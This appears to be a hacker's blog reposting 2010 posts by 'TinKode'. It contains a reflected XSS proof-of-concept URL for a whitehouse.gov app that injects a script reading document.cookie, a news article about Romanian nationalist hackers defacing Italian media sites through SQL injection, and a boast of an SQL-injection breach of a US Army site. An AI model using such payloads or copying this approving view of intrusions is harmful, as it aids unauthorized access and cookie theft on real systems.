Wednesday, February 1, 2012

TinKode-WhiteHouse.gov XSS Vulnerability


WhiteHouse.gov XSS Vulnerability

Posted by isrtinkode on April 25, 2010
WhiteHouse.gov XSS Vulnerability
POC:
https://app2.whitehouse.gov/*******?height=200&width=300&urlloc=”><script>alert(document.cookie)</script>
Screen:

Note: You can’t do much with that, but it’s a vulnerability anyway! :)

TinKode-Romanian National Security


RNS – Romanian National Security – Italy

Posted by isrtinkode on May 1, 2010
The group of Romanian hacktivists calling themselves Romanian National Security (RNS) have attacked and defaced multiple websites belonging to the biggest Italian public television company Radiotelevisione Italiana (RAI), as well as leading Italian newspapers La Stampa and Corriere della Sera. The message left behind on the hacked Web properties condemns the association of the Romanian people with the Romani ethnic group, commonly referred to as gypsies.
RNS is a group of Romanian nationalist hackers who appear to have taken issue with how some international publications depict Romania and its people. Their initial hit was carried out earlier this month against renowned British newspaper The Daily Telegraph and resulted in the defacement of two websites hosted under the telegraph.co.uk domain.
Screenshot of  citymusiclab.city.corriere.it/eventi/ defaced
Enlarge  picture
A week later, the group retaliated in a similar fashion against reputable French newspaper Le Monde for a joke made by humorist Jonathan Lambert during a TV show on national television. The staged performance, which had Lambert present the so-called “new Romanian salute” by imitating a beggar with his hand raised, was strongly criticized in Romania for being offensive and racist.
Romanian security blog HackersBlog reports that www.citizenreport.rai.it, a community website owned and operated by the Italian public service broadcaster RAI, was hacked by members of the RNS via SQL injection. The hackers left behind a message, expressing anger at the local media.
The attacks on Italian publications continued with complete defacements of tuttoaffari.lastampa.it and citymusiclab.city.corriere.it/eventi/, two websites belonging to La Stampa and Corriere della Sera, respectively. At the time of writing this article, the index pages of both sites display a shield logo in the colors of the Romanian flag and the same threatening message used in the Radiotelevisione Italiana hack.
Sreenshot of tuttoaffari.lastampa.it defaced
Enlarge  picture
“It’s time to close our fingers into a fist and unforgivingly strike as many times as need be, for you to reap the harvest of your lies. We promise you will not forget about Romania and her past again. We, descendants of Trajan and Decebalus, are not a nation of gypsies! We have run out of patience and, in the name of Romanians everywhere, we warn that if you don’t stop presenting our entire people as Romani or gypsies, even more tricolor flags [reference to Romania's red, yellow and blue flag] will be raised; until all untruths are exposed and apologies are issued,” the message signed by RNS reads.
A Romanian saying, roughly translating into “Eagles may occasionally fly lower than chickens, but chickens will never soar in the sky,” is displayed at the bottom, while Ciprian Porumbescu’s Ballad for Violin and Orchestra plays in the background.
Mirrors of the defaced websites are available via MirrorTurk for the RAI and Corriere della Sera attacks and Zone-H for the La Stampa one. According to HackersBlog, RNS members also found vulnerabilities on lordine.it, storialibera.it, giornaledicalabria.it, unita.it, pontediferro.org and momentosera.it, but these websites have not yet been defaced.
Source: http://news.softpedia.com/news/Romanian-Nationalists-Hit-Several-Italian-Media-Outlets-141062.shtml
Antena 1:

TinKode-www.stanley.army.mil Hacked


www.stanley.army.mil Hacked

Posted by isrtinkode on May 2, 2010
URL: http://www.stanley.army.mil
Informations: FTP Access
Method: SQL Injection
Screenshot: http://img697.imageshack.us/img697/9268/wwwstanleyarmymil.png